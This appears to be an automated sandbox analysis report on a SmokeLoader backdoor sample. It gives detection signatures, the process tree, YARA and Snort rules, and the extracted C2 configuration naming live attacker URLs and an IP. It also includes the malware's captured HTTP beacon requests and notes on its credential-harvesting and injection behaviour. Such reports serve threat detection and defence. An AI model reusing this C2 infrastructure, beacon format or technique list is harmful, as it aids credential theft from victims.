Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe

Overview

General Information

Sample name:171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe
Analysis ID:1448294
MD5:9c0de297b9ea30ffbe100ee12150f122
SHA1:da6096edee23cfd59cf90c1e6a3a9146ae9d5ff0
SHA256:f7544f07b4468e38e36607b5ac5b3835eac1487e7d16dd52ca882b3d021c19b6
Tags:base64-decodedexe
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if browser processes are running
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to compare user and computer (likely to detect sandboxes)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file has a writeable .text section
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe (PID: 5480 cmdline: "C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe" MD5: 9C0DE297B9EA30FFBE100EE12150F122)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 7616 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 7640 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 7672 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 7688 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 7716 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
        • WerFault.exe (PID: 7812 cmdline: C:\Windows\system32\WerFault.exe -u -p 7716 -s 700 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • explorer.exe (PID: 7740 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 7840 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 7900 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 7944 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • rrrrcve (PID: 7576 cmdline: C:\Users\user\AppData\Roaming\rrrrcve MD5: 9C0DE297B9EA30FFBE100EE12150F122)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\rrrrcveJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1743449635.00000000004F1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000000.00000002.1743449635.00000000004F1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        00000005.00000002.1970433561.0000000001FC1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000005.00000002.1970433561.0000000001FC1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
          • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
          0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              0.0.171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                5.2.rrrrcve.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  5.0.rrrrcve.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\rrrrcve, CommandLine: C:\Users\user\AppData\Roaming\rrrrcve, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\rrrrcve, NewProcessName: C:\Users\user\AppData\Roaming\rrrrcve, OriginalFileName: C:\Users\user\AppData\Roaming\rrrrcve, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\rrrrcve, ProcessId: 7576, ProcessName: rrrrcve

                    Snort Signatures

                    Timestamp:05/28/24-08:25:40.383744
                    SID:2039103
                    Source Port:49748
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/28/24-08:25:18.651241
                    SID:2039103
                    Source Port:49747
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/28/24-08:23:59.175650
                    SID:2039103
                    Source Port:49736
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/28/24-08:25:17.382161
                    SID:2039103
                    Source Port:49746
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://vilendar.ga/index.phpAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\rrrrcveAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                    Found malware configuration
                    Source: 00000000.00000002.1742950739.00000000001F0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\rrrrcveReversingLabs: Detection: 55%
                    Multi AV Scanner detection for submitted file
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeReversingLabs: Detection: 55%
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeVirustotal: Detection: 57%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\rrrrcveJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeJoe Sandbox ML: detected
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03003098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,6_2_03003098
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03003717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,6_2_03003717
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03003E04 RtlCompareMemory,CryptUnprotectData,6_2_03003E04
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0300123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,6_2_0300123B
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03001198 CryptBinaryToStringA,CryptBinaryToStringA,6_2_03001198
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_030011E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,6_2_030011E1
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03001FCE CryptUnprotectData,RtlMoveMemory,6_2_03001FCE
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_008326AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,8_2_008326AC
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0038178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,9_2_0038178C
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0038118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,9_2_0038118D
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00842404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,11_2_00842404
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0084245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,11_2_0084245E
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0084263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,11_2_0084263E
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_006D25A4 CryptBinaryToStringA,CryptBinaryToStringA,16_2_006D25A4
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_006D2799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,16_2_006D2799
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03002B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,6_2_03002B15
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03003ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,6_2_03003ED9
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03001D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,6_2_03001D4A
                    Source: C:\Windows\explorer.exeCode function: 7_2_009830A8 FindFirstFileW,FindNextFileW,FindClose,7_2_009830A8
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_0083255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,8_2_0083255C
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_003815BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,9_2_003815BE
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_003813FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,9_2_003813FE
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_003814D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,9_2_003814D8
                    Source: C:\Windows\explorer.exeCode function: 10_2_00CA1DB0 FindFirstFileW,FindNextFileW,FindClose,10_2_00CA1DB0
                    Source: C:\Windows\explorer.exeCode function: 10_2_00CA1EB4 FindFirstFileW,FindNextFileW,FindClose,10_2_00CA1EB4
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49736 -> 77.232.129.190:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49746 -> 77.232.129.190:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49747 -> 77.232.129.190:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49748 -> 77.232.129.190:80
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 77.232.129.190 80Jump to behavior
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: http://prolinice.ga/index.php
                    Source: Malware configuration extractorURLs: http://vilendar.ga/index.php
                    Source: Joe Sandbox ViewASN Name: BSTV-ASRU BSTV-ASRU
                    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ucwdyepiwprre.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: prolinice.ga
                    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prolinice.ga/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 4431Host: prolinice.ga
                    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://klhdddxmavj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: prolinice.ga
                    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://angnktfflahc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: prolinice.ga
                    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wcxnjsqwwfpkqnc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: prolinice.ga
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: prolinice.ga
                    Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ucwdyepiwprre.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: prolinice.ga
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 06:23:59 GMTServer: Apache/2.4.59 (Debian)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 32 64 38 38 0d 0a b9 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3 9c 8d b7 27 5d c1 30 78 b2 34 fc 64 ca 38 5b 03 cf 4b a0 90 08 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 78 d7 7b c7 34 f8 40 a6 ce 9e 68 07 d1 3b db 70 67 ae de de 5f 1b 81 d3 b1 e8 be 06 9b bd 51 aa 40 d1 5b 4e 04 32 d7 97 2a e0 96 cc f3 08 be 06 f4 ef f1 48 d0 25 d9 73 3b 22 c7 0f b5 72 bf c3 e5 81 32 31 c9 f4 a1 4c ee 90 56 05 52 a9 1c 76 6f 99 dc ff 39 62 09 4e 0e 7c a8 50 2c 99 64 73 2c f8 8e 19 ec 5e 4c 2b 1b 6a 20 6d e3 2e 26 3e f2 ee 67 21 84 c5 3d 2f 72 90 3a ea 6c 5f b3 01 1d 55 2a 97 6b 1b 48 d7 18 d0 92 ef 20 3e 28 8e b6 b7 0f 4f c2 e3 41 ee a3 e2 e5 4f 7c 04 cf 84 8c 71 e5 91 3b ef 9c 40 2b b4 81 b3 6f 0c e5 ea f4 a9 02 25 53 be 6e 6e 71 ce db f8 20 6e 55 5b a4 66 26 ed 43 1b d2 35 1a 47 54 5d 20 0c 1b 03 8a 54 94 fb f1 d9 5d 91 01 a9 f6 90 b3 3e c6 10 cc 67 ca 7b 76 0b 97 06 5b d8 d2 e2 0f 79 af ed 1b 53 92 e1 e9 cc 7a b6 b9 98 42 38 a5 00 49 58 88 86 83 3c a1 5c d3 72 7d ad bc 8d 80 b4 ea 85 32 d9 b9 33 ce ae d5 90 f4 bb 3a c9 3d 3b 48 a7 e3 58 dd be d0 8a aa 01 3e 48 f4 19 2b 95 d5 65 ff b4 78 a1 d2 cd 69 0a 91 f7 6a 18 3d 4f 75 b1 bc 1b b1 60 c8 27 8c 70 db 33 0d a6 f2 ed 80 8d aa 7c 4a 8c 59 8c 3d 99 a9 52 09 0f d9 5e 58 eb 6f 11 c9 5b 23 0e a9 04 11 b7 a5 6b eb 6e 85 01 89 5e cf 54 06 96 02 2d c3 92 6c 61 40 ee 39 ff fa 3e 0d c6 24 8f 1c 02 ac 7a ab 13 d0 be a8 cb 90 7c 6b d5 fb ae 58 ee db 76 10 36 cb d3 c0 5d 0e e0 08 4f 38 94 52 92 70 bf 7c bd c4 0d 6f f9 74 7a 41 a6 59
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 06:24:02 GMTServer: Apache/2.4.59 (Debian)Content-Length: 409Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 72 6f 6c 69 6e 69 63 65 2e 67 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 06:25:18 GMTServer: Apache/2.4.59 (Debian)Content-Length: 168Connection: closeContent-Type: text/html; charset=utf-8Data Raw: a4 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3 Data Ascii: _'!yS5&D?Rv^7:8d%8^C{x+s(N0#Q*,3M@y+{s'Pht]SI":2.(QZ`l pbd8
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 06:25:19 GMTServer: Apache/2.4.59 (Debian)Content-Length: 168Connection: closeContent-Type: text/html; charset=utf-8Data Raw: a4 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3 Data Ascii: _'!yS5&D?Rv^7:8d%8^C{x+s(N0#Q*,3M@y+{s'Pht]SI":2.(QZ`l pbd8
